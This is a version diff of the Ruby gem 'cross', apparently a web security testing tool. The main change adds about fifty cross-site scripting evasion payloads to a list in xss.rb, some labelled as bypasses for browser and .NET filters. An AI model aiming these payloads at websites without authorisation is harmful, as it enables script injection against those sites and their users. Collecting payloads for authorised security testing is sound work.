cross 0.20.0 → 0.30.0
- data/lib/cross/version.rb +1 -1
- data/lib/cross/xss.rb +50 -1
- metadata +3 -4
- data/README.md +0 -29
data/lib/cross/version.rb
CHANGED
data/lib/cross/xss.rb
CHANGED
@@ -9,7 +9,56 @@ module Cross
|
|
9
9
|
"/--><script>alert('cross canary');</script>",
|
10
10
|
"/--></ScRiPt><ScRiPt>alert('cross canary');</ScRiPt>",
|
11
11
|
"//;-->alert('cross canary');",
|
12
|
-
"\"//;\nalert('cross canary');"
|
12
|
+
"\"//;\nalert('cross canary');",
|
13
|
+
# more exotic vectors (antisnatchor's collection)
|
14
|
+
"<script/anyjunk>alert('cross canary')</script>",
|
15
|
+
"<<script>alert('cross canary');//<</script>",
|
16
|
+
"<img onerror=alert('cross canary') src=a>",
|
17
|
+
"<xml onreadystatechange=alert('cross canary')>",
|
18
|
+
"<style onreadystatechange=alert('cross canary')>",
|
19
|
+
"<iframe onreadystatechange=alert('cross canary')>",
|
20
|
+
"<object onerror=alert('cross canary')>",
|
21
|
+
"<object type=image src=/images/live.gif onreadystatechange=alert('cross canary')></object>",
|
22
|
+
"<img type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
|
23
|
+
"<input type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
|
24
|
+
"<isindex type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
|
25
|
+
"<script onreadystatechange=alert('cross canary')>",
|
26
|
+
"<bgsound onpropertychange=alert('cross canary')>",
|
27
|
+
"<body onbeforeactivate=alert('cross canary')>",
|
28
|
+
"<body onfocusin=alert('cross canary')>",
|
29
|
+
"<input autofocus onfocus=alert('cross canary')>",
|
30
|
+
"<input onblur=alert('cross canary') autofocus><input autofocus>",
|
31
|
+
"<body onscroll=alert('cross canary')><br><br>...<br><input autofocus>",
|
32
|
+
"</a onmousemove=alert('cross canary')>",
|
33
|
+
"<video src=1 onerror=alert('cross canary')>",
|
34
|
+
"<audio src=1 onerror=alert('cross canary')>",
|
35
|
+
"<object data=javascript:alert('cross canary')>",
|
36
|
+
"<iframe src=javascript:alert('cross canary')>",
|
37
|
+
"<embed src=javascript:alert('cross canary')>",
|
38
|
+
"<form id=test /><button form=test formaction=javascript:alert('cross canary')>",
|
39
|
+
"<event-source src=javascript:alert('cross canary')>",
|
40
|
+
"<x style=behavior:url(#default#time2) onbegin=alert('cross canary')>",
|
41
|
+
"<x style=x:expression(alert('cross canary'))>",
|
42
|
+
"<x onclick=alert('cross canary') src=a>Click here</x>",
|
43
|
+
"<img onerror=\"alert('cross canary')\"src=a>",
|
44
|
+
"<img onerror=`alert('cross canary')`src=a>",
|
45
|
+
"<img/onerror=\"alert('cross canary')\"src=a>",
|
46
|
+
"<img onerror=alert('cross canary') src=a>",
|
47
|
+
"<img onerror=alert('cross canary') src=a>",
|
48
|
+
"<img onerror=alert('cross canary') src=a>",
|
49
|
+
"<img onerror=alert('cross canary') src=a>",
|
50
|
+
"<img onerror=alert('cross canary') src=a>",
|
51
|
+
"<img onerror=alert('cross canary') src=a>",
|
52
|
+
"<img onerror=alert('cross canary') src=a>",
|
53
|
+
"<img onerror=alert('cross canary') src=a>",
|
54
|
+
"<img onerror=alert('cross canary') src=a>",
|
55
|
+
"<script>function::['alert']('cross canary')</script>",
|
56
|
+
"<svg><script>//
alert('cross canary')</script>", #Chrome <= 18 XssAuditor bypass
|
57
|
+
"<script>/*///*/alert('cross canary');</script>", #Chrome <= 20 XssAuditor bypass
|
58
|
+
"<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('cross canary'))>", #.NET RequestValidator bypass
|
59
|
+
"+ADw-script+AD4-alert('cross canary')+ADw-/script+AD4-", # UTF-7
|
60
|
+
"},alert('cross canary'),function x(){//", # DOM breaker
|
61
|
+
"\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert('cross canary')\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
|
13
62
|
]
|
14
63
|
evasions.each do |pattern|
|
15
64
|
yield pattern if block_given?
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: cross
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.
|
4
|
+
version: 0.30.0
|
5
5
|
prerelease:
|
6
6
|
platform: ruby
|
7
7
|
authors:
|
@@ -121,7 +121,6 @@ files:
|
|
121
121
|
- .rvmrc
|
122
122
|
- Gemfile
|
123
123
|
- LICENSE
|
124
|
-
- README.md
|
125
124
|
- README.rdoc
|
126
125
|
- Rakefile
|
127
126
|
- VERSION
|
@@ -147,7 +146,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
|
|
147
146
|
version: '0'
|
148
147
|
segments:
|
149
148
|
- 0
|
150
|
-
hash:
|
149
|
+
hash: 3227883298359843932
|
151
150
|
required_rubygems_version: !ruby/object:Gem::Requirement
|
152
151
|
none: false
|
153
152
|
requirements:
|
@@ -156,7 +155,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
156
155
|
version: '0'
|
157
156
|
segments:
|
158
157
|
- 0
|
159
|
-
hash:
|
158
|
+
hash: 3227883298359843932
|
160
159
|
requirements: []
|
161
160
|
rubyforge_project:
|
162
161
|
rubygems_version: 1.8.24
|
data/README.md
DELETED
@@ -1,29 +0,0 @@
|
|
1
|
-
# Cross
|
2
|
-
|
3
|
-
TODO: Write a gem description
|
4
|
-
|
5
|
-
## Installation
|
6
|
-
|
7
|
-
Add this line to your application's Gemfile:
|
8
|
-
|
9
|
-
gem 'cross'
|
10
|
-
|
11
|
-
And then execute:
|
12
|
-
|
13
|
-
$ bundle
|
14
|
-
|
15
|
-
Or install it yourself as:
|
16
|
-
|
17
|
-
$ gem install cross
|
18
|
-
|
19
|
-
## Usage
|
20
|
-
|
21
|
-
TODO: Write usage instructions here
|
22
|
-
|
23
|
-
## Contributing
|
24
|
-
|
25
|
-
1. Fork it
|
26
|
-
2. Create your feature branch (`git checkout -b my-new-feature`)
|
27
|
-
3. Commit your changes (`git commit -am 'Added some feature'`)
|
28
|
-
4. Push to the branch (`git push origin my-new-feature`)
|
29
|
-
5. Create new Pull Request
|